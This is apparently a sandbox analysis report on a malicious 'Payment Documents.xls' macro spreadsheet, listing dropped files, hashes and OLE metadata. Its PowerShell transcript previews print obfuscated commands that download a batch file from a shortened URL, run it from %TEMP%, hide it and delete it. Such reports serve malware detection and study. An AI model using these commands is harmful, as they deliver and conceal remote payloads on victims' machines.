                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32xky4ra.ypx.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33z3dqz3.zpf.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cysdecj0.tcn.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ee14i5n4.icg.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5yekrrb.bqd.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsdi5hqe.vde.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3yxefqa.e1q.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugxq0ae1.gbs.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnvc3jzs.0bs.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed Jan 6 06:41:21 2021, atime=Wed Jan 6 06:41:21 2021, length=12288, window=hide
                          Category:dropped
                          Size (bytes):904
                          Entropy (8bit):4.662618421999403
                          Encrypted:false
                          SSDEEP:12:8/chXUYduCH2KOu4K8cC+WrjAZ/DYbDKwXpSeuSeL44t2Y+xIBjKZm:80XisoAZbcDKw7aB6m
                          MD5:9538AD3B57630C8A7A922002ECFB2EDB
                          SHA1:965390F8FB5A5B54F191C5FCAA69D59003E68ABE
                          SHA-256:4B024A471696DCF3010E8A436259BFAB45AC43C24B54AD2D1967C9A49D87DD94
                          SHA-512:412CD98BC76BEE352151576E810B1A0E8F5CE57E716B9A748CBCE31169C9D1BE5A410898F853B333C05FBD1A7D47EE73F89F91C7814B18EC388F2DB788ECCAE4
                          Malicious:false
                          Preview: L..................F.............-..o>.S.....?.S.....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..&R.=....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..&R.=....#J......................O.j.o.n.e.s.....~.1.....&R+=..Desktop.h.......N..&R+=.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......887849...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment Documents.LNK
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Wed Jan 6 06:41:21 2021, atime=Wed Jan 6 06:41:21 2021, length=34816, window=hide
                          Category:modified
                          Size (bytes):2180
                          Entropy (8bit):4.6953721631969225
                          Encrypted:false
                          SSDEEP:24:8BiRxXaArb2esDKk7aB6myBiRxXaArb2esDKk7aB6m:8BiRRJrCSB6pBiRRJrCSB6
                          MD5:BC0943AFB939B5E54320E05FFFA7AD8A
                          SHA1:33D66D26E83BE3702C7E96FFE37097A2719ED994
                          SHA-256:6962DCB3A9E150B37D3A27CE0E5E48F29022C1F856817F81F2EB347A95777415
                          SHA-512:D1163F2288676ADCAD335D774E9E3A05970C79C064EF1CB66FF4453574C7893E24649A5B5BEDCC3244A1E2C72C5DBAD658CD994D7DE7AFF67C03CF59EB1E05ED
                          Malicious:false
                          Preview: L..................F.... ....k.S.....?.S.....?.S.................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..&R.=....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..&R.=....#J......................O.j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N..&R.=.....Y..............>...../...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..l..&R&= .PAYMEN~1.XLS..\......>Q{<&R&=.....V......................L.P.a.y.m.e.n.t. .D.o.c.u.m.e.n.t.s...x.l.s.......[...............-.......Z...........>.S......C:\Users\user\Desktop\Payment Documents.xls..,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .D.o.c.u.m.e.n.t.s...x.l.s.........:..,.LB.)...As...`.......X.......887849...........!a..%.H.VZAj...V................!a..%.H.VZAj...V...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):104
                          Entropy (8bit):4.6102361706081885
                          Encrypted:false
                          SSDEEP:3:oyBVomMBLIoAlWCtDLIoAlWCmMBLIoAlWCv:dj6B1AkUD1AkUB1Aks
                          MD5:CCD123EBC7377344ACE407E148117C57
                          SHA1:EDCFC820DB63653300053FD268378C5D40426551
                          SHA-256:2B8AC2E8B07ECAF5A21662885BB04BE336B48E59EB3F7091B59A9FC7AF6AA6E9
                          SHA-512:211E64F87B6B1F1B5F4729BDD3D6C6E132B9469A211977B54EA5D2186C5425CF971D3666D1C426CD1DE5AD26B7935C778AC0010F22057F54E04C34071C680C6C
                          Malicious:false
                          Preview: Desktop.LNK=0..[xls]..Payment Documents.LNK=0..Payment Documents.LNK=0..[xls]..Payment Documents.LNK=0..
                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                          Category:dropped
                          Size (bytes):22
                          Entropy (8bit):2.9808259362290785
                          Encrypted:false
                          SSDEEP:3:QAlX0Gn:QKn
                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                          Malicious:false
                          Preview: ....p.r.a.t.e.s.h.....
                          C:\Users\user\Desktop\04D40000
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:Applesoft BASIC program data, first line number 16
                          Category:dropped
                          Size (bytes):65195
                          Entropy (8bit):4.548248785404687
                          Encrypted:false
                          SSDEEP:1536:1AAcGk3hbdlylKsgqopeJBWhZFGkE+cL2Ndg12jAAcGk3hbdlylKsgqopeJBWhZP:aGk3hbdlylKsgqopeJBWhZFGkE+cL2Na
                          MD5:F42CEC7331925D95377A3D83263E6CDC
                          SHA1:CF24165338C75E5522DDAA1442B083B5AEC1CA4A
                          SHA-256:9F500A6EA4D9BF85A05383A89DB0F2D93E06FE606BBDE214B62675F2CEFCB1A8
                          SHA-512:6030D942AFC4456193C09A9AC0CE89327721C1610A4F64C11C43DCD9155E48EF15A52C2179D54BF520C6A7B32142D359F76951CC7252507FED58159A07FD9DB9
                          Malicious:false
                          Preview: ........T8..........................\.p....pratesh B.....a.........=..............ThisWorkbook....................................=........p^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                          C:\Users\user\Documents\20210106\PowerShell_transcript.887849.XYrnnd8c.20210106084124.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):3220
                          Entropy (8bit):5.380316480107512
                          Encrypted:false
                          SSDEEP:96:BZyjeN6qDo1ZCZmjeN6qDo1ZYKV2V2tb8Zat:g44j
                          MD5:E4FF182110EBB3154858A0F2F2BD9EF8
                          SHA1:DE4433DF5B3DD08DA780BF42F8EE402EDCEA168C
                          SHA-256:20F673C7996684EA198723E15D668BB7AF858D679EAE395950EF5191B68AFEC1
                          SHA-512:062E020CD4FB2FDE31A3376AA79A81EA31A126A109281820157D2699E3E8A2FC195B765C8C710886300661A391D861B6A6ADEBC82DAEDB1616F4FC821EABE638
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210106084202..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 3; Move-Item pd.bat -Destination $e`nV:T`EMP..Process ID: 5980..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210106084202..**********************..PS>stARt`-slE`Ep 3; Move-Item pd.bat -Destination $e`nV:T`EMP..**********************..Windows PowerShell transcript start..Start time: 20210106084934..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Ho
                          C:\Users\user\Documents\20210106\PowerShell_transcript.887849.e0aXBGk_.20210106084125.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):961
                          Entropy (8bit):5.069610640801537
                          Encrypted:false
                          SSDEEP:24:BxSAQ7vBZuzx2DOXJYFWWx5HjeTKKjX4CIym1ZJXHYFVnxSAZ5y:BZOvjeoOZ6RnqDYB1ZB6JZZ5y
                          MD5:199CE846A530A2173FDE7927890AA9E1
                          SHA1:F8B218DA3C3EF7A2D0FC911C29B343D72CE58AD3
                          SHA-256:FFEEF3B43EE5D206CA09C9696D6625F8DC9ABC08DACE83BB571AEA8B7D9272B2
                          SHA-512:F3F777467810F03DC024A792062AF129F7DFA5ABEC6C42E0E55577507EF28736ED99DCDC83A1E384101F594E634918B69859EA1F5ED76DFD4E1D564577B9C22D
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210106084211..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force..Process ID: 4344..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210106084212..**********************..PS>stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force..**********************..Command start time: 20210106085331..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20210106085433..**********************..
                          C:\Users\user\Documents\20210106\PowerShell_transcript.887849.mGm6oFJ9.20210106084131.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1043
                          Entropy (8bit):5.250218685603447
                          Encrypted:false
                          SSDEEP:24:BxSA8Ty7vBZuzx2DOXsKGlWTrHjeTKKjX4CIym1ZJXZKGWnxSAZ0:BZnvjeoOlGMvqDYB1ZWG4ZZ0
                          MD5:B8317DEABB0F940415E3B46B4EEE3174
                          SHA1:C042DABF47AC02F66D8357B34989CFC53BF5E6E8
                          SHA-256:65587ECCD5965497CB7AA9415C2560F0A73E8BDF4F323C82BD04CC3CBE40D87A
                          SHA-512:82264869F0096A8FFCD8339FE1FD73E88A0777E748C8E6FB0E6A429D11D8BFEBA76B9A62DFF2055A5BD002AACA1C14960678212EA83651CF51D00A91B981FC1D
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210106084214..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')..Process ID: 6496..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210106084215..**********************..PS>(nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')..**********************..Command start time: 20210106084956..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End tim
                          C:\Users\user\Documents\20210106\PowerShell_transcript.887849.w03wfjCX.20210106084127.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                          Category:dropped
                          Size (bytes):5584
                          Entropy (8bit):5.294010001055106
                          Encrypted:false
                          SSDEEP:96:BZVjeNbqDo1ZTgZojeNbqDo1ZgxUUrsZQjeNbqDo1ZoWDeNwCeNwCenw7ZP:w8Delelee
                          MD5:6A75A1149063561C9B0F2182C5D431EA
                          SHA1:31723236F2E9967FB34B3EABB51A2885F6B53477
                          SHA-256:13BE2BAE29DF340DA06B21BD0266763B01AA913DEED4560AB1FB4EC5463525D3
                          SHA-512:50D3B9E7CC916A18DA017F4CCA231520F1954850CE4345C2F6B576D4B48098B0F00251A61B2FAE377A70DEA9A3B398E393B3F56378F60BFC7D501D0A505FCE4A
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210106084205..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 7;cd $e`nV:T`EMP; ./pd.bat..Process ID: 6376..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210106084207..**********************..PS>stARt`-slE`Ep 7;cd $e`nV:T`EMP; ./pd.bat..**********************..Windows PowerShell transcript start..Start time: 20210106085342..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stAR
                          C:\Users\user\Documents\20210106\PowerShell_transcript.887849.yDJ4YGd3.20210106084126.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):960
                          Entropy (8bit):5.0528572406409
                          Encrypted:false
                          SSDEEP:24:BxSAQ7vBZuzx2DOXJuzWXHjeTKKjX4CIym1ZJXHFUGnxSAZIq:BZOvjeoOZZXqDYB1ZBjZZIq
                          MD5:413DB04E6D6CBF146834444CEE16CA0F
                          SHA1:36CF7BC52B8615D98DA732CA700BA45B9D403942
                          SHA-256:0D94CBE2F74C48D196D86179F79DF6E1113957A025D6DEEBE5D284754F4D231B
                          SHA-512:47C9A19DD895740B41B8F5FB83C421CB2FED3DD900E42F0A51C24B194BD7700062110D13CC285E94F15C5F2250DFFD29C34EC1555FC2133FA32613E0429D4628
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210106084211..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 887849 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat..Process ID: 4832..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210106084212..**********************..PS>stARt`-slE`Ep 1; attrib +s +h pd.bat..File not found - pd.bat..**********************..Command start time: 20210106084822..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20210106084851..**********************..

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                          Entropy (8bit):4.299085514839668
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:Payment Documents.xls
                          File size:27648
                          MD5:3acbe5e1d7a0dceb1125d987988765ea
                          SHA1:7fafd588ff8b2e8fda79eab3a9460fa3c01bd6d8
                          SHA256:e331f9c19372cfd42c85f2bbf26f58e9800c2f14504aed43825c7da3ef913d7a
                          SHA512:049d8b21495cbb5d4e50028f8d3d065a028ba519f5633b49e60cb3b0e81419efa56f1c4db8498e8b317c5e125332ad45c972b5525e878866fa639c3ed367afd5
                          SSDEEP:768:DIHVnSGiysRchNXHfA1MiWhZFGkEld+DrCWfO1FmXe:oVnSGiysRchNXHfA1MiWhZFGkEld+Dre
                          File Content Preview:........................;...................................3..................................................................................................................................................................................................

                          File Icon

                          Icon Hash:74ecd4c6c3c6c4d8

                          Static OLE Info

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          OLE File "Payment Documents.xls"

                          Indicators

                          Has Summary Info:True
                          Application Name:unknown
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1252
                          Last Saved By:blobijump
                          Create Time:2020-09-20 21:17:44
                          Last Saved Time:2021-01-03 23:14:32
                          Security:1

                          Document Summary

                          Document Code Page:1252
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:1048576

                          Streams

                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:276
                          Entropy:3.16930549839
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:156
                          Entropy:3.29938329109
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 24824
                          General
                          Stream Path:Workbook
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:24824
                          Entropy:4.33921706453
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
